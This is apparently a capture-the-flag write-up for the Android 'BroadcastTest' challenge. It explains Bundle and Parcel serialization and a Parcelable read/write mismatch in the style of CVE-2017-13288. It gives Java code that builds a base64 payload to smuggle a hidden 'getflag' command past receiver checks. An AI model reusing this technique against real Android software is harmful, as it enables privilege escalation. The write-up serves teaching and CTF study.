BroadcastTest
Writeup
background
We reverse the apk and find out that we only have 4 classes: MainActivity$Message
, Receiver
1-3. and MainActivity$Message
implement from Parcelable class.
Receiver1
is exported. It receive global broadcast and send the bundle to Receiver2
.
Receiver2
and Recevier3
isn't exported, so they can only receive broadcasts from this apk.
The procedure is
Receiver1
receive the data from broadcast, and decode it by base64, then marshall it to a bundle, and send it as a broadcast toReceiver2
.Receiver2
check the "command", assert value != 'getflag', then send it toReceiver3
.Receiver3
check the "command", assert value == 'getflag.
I search the parcel and bundle then find this article and CVE-2017-13288.
theory
Android can marshal an object by implementing from Parceable.
The class must implement writeToParcel
and readFromParcel
method to describe how to marshal and unmarshal.
Parcelable object needs to be taken by Bundle, which is a hashmap.
Bundle can be put key-value by PutExtra(key, value)
. The type of value can be int, Boolean, String or Parcelable object etc.
// Keep in sync with frameworks/native/include/private/binder/ParcelValTypes.h.
private static final int VAL_NULL = -1;
private static final int VAL_STRING = 0;
private static final int VAL_INTEGER = 1;
private static final int VAL_MAP = 2;
private static final int VAL_BUNDLE = 3;
private static final int VAL_PARCELABLE = 4;
private static final int VAL_SHORT = 5;
private static final int VAL_LONG = 6;
private static final int VAL_FLOAT = 7;
It will write len of total, magic number, and key-value pairs.
From BaseBundle.writeToParcelInner
:
int lengthPos = parcel.dataPosition();
parcel.writeInt(-1); // dummy, will hold length
parcel.writeInt(BUNDLE_MAGIC);
int startPos = parcel.dataPosition();
parcel.writeArrayMapInternal(map);
int endPos = parcel.dataPosition();
// Backpatch length
parcel.setDataPosition(lengthPos);
int length = endPos - startPos;
parcel.writeInt(length);
parcel.setDataPosition(endPos);
pacel.writeArrayMapInternal
will write the number of hashmap, then key and value.
/**
* Flatten an ArrayMap into the parcel at the current dataPosition(),
* growing dataCapacity() if needed. The Map keys must be String objects.
*/
/* package */ void writeArrayMapInternal(ArrayMap<String, Object> val) {
...
final int N = val.size();
writeInt(N);
...
int startPos;
for (int i=0; i<N; i++) {
if (DEBUG_ARRAY_MAP) startPos = dataPosition();
writeString(val.keyAt(i));
writeValue(val.valueAt(i));
...
writeValue
will write the type and value. If the type is Parceable, writing will call writeParcelable
method, which call writeToParcel
in Parcelable
object.
public final void writeValue(Object v) {
if (v == null) {
writeInt(VAL_NULL);
} else if (v instanceof String) {
writeInt(VAL_STRING);
writeString((String) v);
} else if (v instanceof Integer) {
writeInt(VAL_INTEGER);
writeInt((Integer) v);
} else if (v instanceof Map) {
writeInt(VAL_MAP);
writeMap((Map) v);
} else if (v instanceof Bundle) {
// Must be before Parcelable
writeInt(VAL_BUNDLE);
writeBundle((Bundle) v);
} else if (v instanceof PersistableBundle) {
writeInt(VAL_PERSISTABLEBUNDLE);
writePersistableBundle((PersistableBundle) v);
} else if (v instanceof Parcelable) {
// IMPOTANT: cases for classes that implement Parcelable must
// come before the Parcelable case, so that their specific VAL_*
// types will be written.
writeInt(VAL_PARCELABLE);
writeParcelable((Parcelable) v, 0);
We can use this code to get the bytes from marshal.
Bundle bundle = new Bundle();
bundle.putParcelable(AccountManager.KEY_INTENT, new MainActivity$Message()));
byte[] bs = {'a', 'a','a', 'a'};
bundle.putByteArray("AAA", bs);
Parcel testData = Parcel.obtain();
bundle.writeToParcel(testData, 0);
byte[] raw = testData.marshall();
writeString
will put '\0' to the end of string.
PAD_SIZE will make the length of unit be the multipiles of 4.
Exploit
MainActivity$Message
is a class implementing from Parceable
.
There are two type-difference:
this.txRate = in.readInt(); dest.writeByte((byte) this.txRate);
this.rttSpread = in.readLong(); dest.writeInt((int) this.rttSpread);
Through test I found that the first type-difference which in byte and int will not create influence, because of PAD_SIZE.
So the second type-difference will cover 4 bytes after Message
object every times readFromParcel
and writeToParcel
.
The intent of this challenge is to hide a key-value pair 'command'='getflag'
, and expose it when it reads again.
The order of bundle is 'length of key, content of key, type of value, length of value, content of value'.
It means that the writing will cover length of key
and make the first 4 bytes of origin content of key
the new length of key
.
So we can construct this payload:
Message | len_key | content_key | type_value | len_value | content_value |
---|---|---|---|---|---|
pad | 15 00 00 00 | 07 00 00 00 "command" 00 00 00 00 00 00 07 00 00 00 "getflag" 00 00 | 00 00 00 00 | 03 00 00 00 | "pad" |
pad 15 00 00 00 | 07 00 00 00 | "command" 00 00 | 00 00 00 00 | 07 00 00 00 | "getflag" 00 00 |
The format of string is UTF-16, two bytes every char.
type=0 means VAL_STRING
.
Another need to do is that Receiver2
need bundle.getString("command")!=null
, so we need another key-value pair 'command'='xxx'
.
So one of the payloads is:
Parcel a = Parcel.obtain();
Parcel b = Parcel.obtain();
a.writeInt(3);//Count
a.writeString("mismatch");
a.writeInt(4);//Parcable
a.writeString("com.de1ta.broadcasttest.MainActivity$Message");
a.writeString("bssid");
a.writeInt(1);
a.writeInt(2);
a.writeInt(3);
a.writeInt(4);
a.writeInt(5);
a.writeInt(6);
a.writeInt(7);
a.writeLong(8);
a.writeInt(9);
a.writeInt(10);
a.writeInt(-1);
a.writeLong(11);
a.writeLong(12);
a.writeLong(0x11223344);
// fake map
// \7\0 => hide_len_key
// command\0 => hide_content_key
// \0\0 => hide_type_value
// \7\0 => hide_len_value
// getflag\0 => hide_content_value
a.writeString("\7\0command\0\0\0\7\0getflag");
a.writeInt(0);//fake_type
a.writeString("");//fake_value
a.writeString("command");//for bundle.getString("command")!=null
a.writeInt(0);
a.writeString("gotflag");
int len = a.dataSize();
b.writeInt(len);
b.writeInt(0x4c444E42);
b.appendFrom(a, 0, len);
b.setDataPosition(0);
byte[] raw = b.marshall();
String output = Base64.encodeToString(raw, 0);
Log.i("test", output);
Other
I use this payload1 in match:
a.writeString("\7\0command\0\0\0\7\0getflag\0");
a.writeInt(0);//fake_type
a.writeString("1");//fake_value
But marshaling shows that fake_key contains 3 zero char after 'getflag'. It costs 6 bytes.
I search it and find that writeString
method will put '\0' to the end of string, then pad size.
But if I remove the zero, writeString("\7\0command\0\0\0\7\0getflag")
, the end zero will be at the end. It costs 44 bytes without padding.
The structure is
Message | len_key | content_key | type_value | len_value | content_value | len_key2 | content_key2 | type_value2 | len_value2 | content_value2 |
---|---|---|---|---|---|---|---|---|---|---|
pad | 15 00 00 00 | 07 00 00 00 "command" 00 00 00 00 00 00 07 00 00 00 "getflag" 00 00 | 00 00 00 00 | 01 00 00 00 | "1" | 07 00 00 00 | "command" | 00 00 00 00 | 00 00 00 00 | null |
pad 15 00 00 00 | 07 00 00 00 | "command" 00 00 | 00 00 00 00 | 07 00 00 00 | "getflag" 00 00 | 00 00 00 00 | 01 00 00 00 | "1" | 07 00 00 00 | "command" |
We can find the type_value2
is error.
So we need to construct fake_value1=""
.
Message | len_key | content_key | type_value | len_value | content_value | len_key2 | content_key2 | type_value2 | len_value2 | content_value2 |
---|---|---|---|---|---|---|---|---|---|---|
pad | 15 00 00 00 | 07 00 00 00 "command" 00 00 00 00 00 00 07 00 00 00 "getflag" 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 07 00 00 00 | "command" | 00 00 00 00 | 00 00 00 00 | null |
pad 15 00 00 00 | 07 00 00 00 | "command" 00 00 | 00 00 00 00 | 07 00 00 00 | "getflag" 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 07 00 00 00 | "command" |
This is the payload2:
a.writeString("\7\0command\0\0\0\7\0getflag");
a.writeInt(0);//fake_type
a.writeString("");//fake_value
For validating my suppose, I use payload3:
a.writeString("\7\0command\0\0\0\7\0getflag\0\0");
a.writeInt(0);//fake_type
a.writeString("1");//fake_value
The bundle created by this payload should be the same as the bundle created by payload1 except length
.
Yes, it is.
But Receiver3
refuse the bundle and raise a exception.
I check it and find the order changed:
'\7\0command...getflag\0\0'='1', Message, 'command'='gotflag'
It means that the payload is correct but it covered 'command'='gotflag'
.
And there is a warning in logcat:
>>W/ArrayMap: New hash -1841832101 is before end of array hash -1212575282 at index 1 key ��command��������getflag����
So the question is Bundle use Arraymap, whose order is decided by hash of the key. We change the key, the hash is changed. It needs to be lower than the hash of key of Message.
Here is the source:
public void append(K key, V value) {
int index = mSize;
final int hash = key == null ? 0
: (mIdentityHashCode ? System.identityHashCode(key) : key.hashCode());
if (index >= mHashes.length) {
throw new IllegalStateException("Array is full");
}
if (index > 0 && mHashes[index-1] > hash) {
RuntimeException e = new RuntimeException("here");
e.fillInStackTrace();
Log.w(TAG, "New hash " + hash
+ " is before end of array hash " + mHashes[index-1]
+ " at index " + index + " key " + key, e);
put(key, value);
return;
}
So I think the value of hash is important to pwn the vulnerability.
The value of hash of key is -1841832101
, so we just need to find a key with lower hash.
String key = "mismatch";
while(key.hashCode()>=-1841832101){
key += ".";
}
a.writeString(key); // key of Message object
This is a project of AndroidStudio which can generate the exploit payload.